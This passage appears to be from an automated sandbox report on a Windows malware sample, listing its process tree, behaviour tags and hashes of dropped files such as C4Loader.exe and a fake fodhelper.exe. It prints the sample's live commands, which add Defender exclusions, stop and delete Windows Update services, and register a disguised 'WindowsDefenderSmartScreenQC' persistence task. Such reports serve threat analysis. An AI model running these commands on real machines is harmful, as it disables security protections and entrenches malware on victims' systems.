  C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 288
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe (depth 2)
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exe (depth 3)
  sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
  sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
  sc stop wuauserv
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
  sc stop bits
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
  sc stop dosvc
- Launches sc.exe
-
C:\Windows\System32\reg.exe (depth 3)
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
C:\Windows\System32\reg.exe (depth 3)
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
-
C:\Windows\System32\reg.exe (depth 3)
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
- Modifies security service
-
C:\Windows\System32\reg.exe (depth 3)
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
-
C:\Windows\System32\reg.exe (depth 3)
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exe (depth 2)
  C:\Windows\System32\dialer.exe
-
C:\Windows\system32\wbem\unsecapp.exe (depth 1)
  C:\Windows\system32\wbem\unsecapp.exe -Embedding
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
- Drops file in System32 directory
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (depth 1)
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
-
C:\Windows\System32\spoolsv.exe (depth 1)
  C:\Windows\System32\spoolsv.exe
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
-
C:\Windows\System32\svchost.exe (depth 1)
  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
-
C:\Windows\system32\svchost.exe (depth 1)
  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
-
C:\Windows\servicing\TrustedInstaller.exe (depth 1)
  C:\Windows\servicing\TrustedInstaller.exe
-
C:\Windows\System32\sihclient.exe (depth 1)
  C:\Windows\System32\sihclient.exe /cv rhW9PRzZrkmM8+DKCWwrAQ.0.2
-
C:\Windows\System32\RuntimeBroker.exe (depth 1)
  C:\Windows\System32\RuntimeBroker.exe -Embedding
-
C:\Windows\system32\backgroundTaskHost.exe (depth 1)
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 4776 -s 672
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 2000 -s 388
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 4772 -s 232
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 2416 -s 420
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 2464 -s 664
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 216 -s 796
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 3632 -s 656
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 5052 -s 476
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 4160 -s 460
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 4188 -s 476
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 3760 -s 388
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 3820 -s 488
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exe (depth 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\WerFault.exe (depth 2)
  C:\Windows\system32\WerFault.exe -u -p 2656 -s 412
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exe (depth 1)
  C:\Windows\system32\WerFault.exe -u -p 2428 -s 716
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
13KB
MD5278fe051cfbc6c6defc72ccdf96595ab
SHA15e6a297e5b3efce8654cd4e37b7b5e0de154cea8
SHA256c7eb6b0d2d8530cdf52a35a734c14d92cdd9f42f50748989c398cc564926c65a
SHA512f9cec7b9e10672a568e39097fd6e73036751c4532c2f75a12e7198f5cbd6b5f61bdc837060c8fbd46de90b938d4107a7eb7c1be20d3132b5902d4a97c15b35f1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFB7.tmp.csvFilesize
36KB
MD58ad5ec7866c3009a4b4c689692a58801
SHA1ed3b134250d4b6742eb608084ac1efd8fc16eac7
SHA25677a76c99098f81e56e82b31fb3e04a3fbfcf8af7c05559d23a5b8560f1b4bf67
SHA512065c195c61ab764e747591fa28b8e49382ad0126ef93fbf490f72ae34d0db2288b034ae2b9f930a8bb96063362fa052d2cb2212fbcd4fbd2554cbdf0f60f2965
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD006.tmp.txtFilesize
13KB
MD5d53bb250b8eaf5c899ebd48a27334050
SHA150d93bf10aa6fd01408f336ba3a016dcf9655988
SHA256261578710d160c7f6f3fc60294f494bbdab3c3408ce6dc4c2b20302718760c08
SHA512cd51bbda97243b8b10c975a730f35b1296145c46e0d5a18feb5a0a16269fe74ed55a8c573510837f5690946e3bd877d01bdb7e10621e7922a217e2dd3da62903
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD77A.tmp.csvFilesize
36KB
MD575d62050306e6a5cfa51f681fdde4510
SHA13f5523db9453ed0ba0a5a4448ac3e3423415958c
SHA25671083f6b46281e2f82e7e37fe12ffed2b6bba8aa0e6920aa87737eee15ec5615
SHA512e795d917971daaa69a72830be7393b3ff7933bceab13f0c5e01503f3c7a9f6bb783641faae60d0d90e08f6b4a86eebce58b3c2702111fdd6ae29a6714cdb4867
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7C9.tmp.txtFilesize
13KB
MD5530cef2eb08b05f6e364b1830e198da3
SHA1367ddbc9c9287d8e37c5500cf862029fbf82053a
SHA2568916b400e967c35f5c7dde7adddb968612d8e0e9775be5dcb47e6fa622b33b39
SHA512d2768cf93d8b63b5438f62ee0c4e684a3d8ee0ac7f58638ea4d36037c5cb58956cdc61e9f6f691f94bfd0f0ccf7d9210ea69e817e83447e25250f5d95723a3e1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE23A.tmp.csvFilesize
36KB
MD5412a2db430b93656cc0c7985c05a2213
SHA1a69ab0c1fb632218a89166ebf78797f40ce6c059
SHA256a5be59267897e106b683e8e54c9551614974f265b9570872ceaa57c8c68709fa
SHA51289fb02e84a654dd1a12adbf0403f73c187bfab6171335550cb23f1c838e75496deb59e75967ebc49e31a2810d36deac97c5627ad1cd0061a3234ddd93ab06fc3
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2B8.tmp.txtFilesize
13KB
MD5ef371f3a8a6e93bc4c73b7a76b433e65
SHA1ed08ca92f64f0209a84fcd0349fd6a0859f5258a
SHA256badb1040052c597c5619eb1c32f7e3e23fe52c4b5293d38371afde918836dfa8
SHA512c5d3422c8fc2091ae665dd55e9d3b73944651e23c3fd615768b91f1144cf352acf63bbe45dc9aeda225e7a40a017cd485aea71ae426630bd9111a7e6156e6b6b
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEA0.tmp.csvFilesize
36KB
MD50021cbda88b9e91c1bddece237a15551
SHA16b88954746960def5894a880b099cc38fc97518d
SHA256b0747b60c660b0e8db3de38848841b97bbc2b3071e497d5d24e46f30bbb38de7
SHA512cefb69c6ccc56861215aac360a95c7f0cf507827b90421197769202bccc7e566a30b7058efdac19a61d7f079069dcfde4abc62579d7bc2fda56ffc0f374507e8
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEEF.tmp.txtFilesize
13KB
MD56f2c689cb76cb1e2517a549007473a08
SHA16c3f79e73c5d2407393a9e246fe88820d929a9c4
SHA25675e67313b5d2ead135c2b0448e6033ca36bdfde1d7acc658d535f3ce6bfc689c
SHA512764f78fa3ce280895e00c3915419f31704719f20c64b30391c106992de66c02f7f6c814d75da882b2e4ab2dfe4cf2aa5d95717285223aa37f95269cdfdb67e1b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD537d4e6dc9153c3092b8a8c4059ee1422
SHA1a5bc9d61f65f7c99d6aa208313043eda2389e080
SHA25644298cea8d4086900648d3ef441d5f2d317f6c405cff7248e385802c21de175d
SHA5122b139058bfc1b547cf7904f831af9e5c05061af92dbd0f3489c77d09c6ef23265aa83753655a7a75d742db22d383a911798c192a834f9b9a50d9c36b7028638c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chkFilesize
8KB
MD5b7f7b69b4ed7a72230cc42f5e0b47a4f
SHA1929855637a87368e9efeead5aa73d20e357d73c5
SHA256d3fbb9e0ee121f424d3bed2d62e57efd22b9bfcb31b4506966365a93d6f2857c
SHA512e7255640003a72ad8faa2d261eefa16f18750c2d581166b909d29709f00ccdd726c0c4d7589c567be472798d53786dd3a0b2f019aad1722a7acaad7e1547c3cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD528b255a2fd5768ccd5b599e567fc2bb8
SHA1611f5d9d4af8aa3dac7305a0613e3c3f93807a7b
SHA256fec95b571491e3964058a86f6bcb242ab8313a88458cc17f3e1e58b6cfeabe23
SHA5121dd7011350d259e5d5dd6dc07332e9db0f7266efb2a00a5362105209dffc9d279164780b2db23a3c5e33b11eafd2183018a3170d24e0d5b56abf8ad8db3d75ae
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD58de645c759808698d80b0d3f2b72cdef
SHA18c1d16d8dd6cd88810e405aeda9d7a117ba972ab
SHA2563dedd335a7e49f4c31af5a96ed016bd0d48923a7edcc67db1b097c93c501856a
SHA512c47b1d9628aa3d49bb2b9a56d0a2eae4aabe52121678506683794de843d57ab049e0949faf3a6e7b008231c7eefa7fbf8cf54584aea120b0116c3d7dcfadefb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.logFilesize
512KB
MD58de645c759808698d80b0d3f2b72cdef
SHA18c1d16d8dd6cd88810e405aeda9d7a117ba972ab
SHA2563dedd335a7e49f4c31af5a96ed016bd0d48923a7edcc67db1b097c93c501856a
SHA512c47b1d9628aa3d49bb2b9a56d0a2eae4aabe52121678506683794de843d57ab049e0949faf3a6e7b008231c7eefa7fbf8cf54584aea120b0116c3d7dcfadefb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.datFilesize
14.0MB
MD55fb5d00eeb08292c47add44177f736af
SHA1f9d92d9057988e720001015df24e3d1ad76ac972
SHA25644e34068b6af9e42f9155c8c86df56ee5aef2e750d00318adb07b02d6f16e07b
SHA512373be8c90187944e993ebc2c91580b605a876f9b3a5ed3125305a51de357893f10e8db1c037a419ac26be029ab4e95ee342a3b76d10a9cfc1c74f93cb7d34b98
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfmFilesize
16KB
MD542b2ed2f65c984d5b24e07c56538d7b9
SHA165ca741635d760693a1648efeb8519c33c8eaa20
SHA2562dca6983464acd87335d88d1f316a65a687c8281b98e7b2d6859e06abd8c641a
SHA5125b3a4ccb07a68bde1e1fd237fa05c01d9d41201d1abfd78cc717dcf6e3356be2da96c4124adc386526a31e862755f79e96811c65362c8ede5fe239aaa1ea0e95
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exeFilesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
C:\Users\Admin\AppData\Local\Temp\RzLNTXYeUCWKsXbGyRAOmBTvKSJfjzaLFilesize
2KB
MD5b2446d155f77cf70a33bb0c25172fa3f
SHA1c20d68dad9e872b4607a5677c4851f863c28daf7
SHA2560faba9ea9b88b2982372c66b2eea8d6a5d99fc565c37db53ba6a4075619cfffb
SHA5125d38e78c38f64a989570b431f7d2ef660c0678b3dc25baf3244499308535492de861a244e262720e36eeb4f8127eca62679c0b0383350c302783246191e82654
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exeFilesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pria4hqk.zem.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPjFilesize
71KB
MD553bf804f75123ed2339305be1d298398
SHA133a337e3e219da8ecd237b44fbcaf4864124a012
SHA2567d6155b8b6c9a78a70af6be7df47f1dac5f40215f4a6ae431d1ee27c021888f8
SHA5127611c75031b77b6098f1e70c1b27e0a95f259616f8b2f8acc734e371998badf321c10c9fb8669d61615673f0fb65787f0398966bda38cd430e009c83df00e16e
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Local\Temp\new2.exeFilesize
3.0MB
MD550d48404f9b93a16c69aed2e6c585192
SHA13f949a4b96bac4f7e1cec881edb5b65295410a1c
SHA2560a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789
SHA5120e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeFilesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-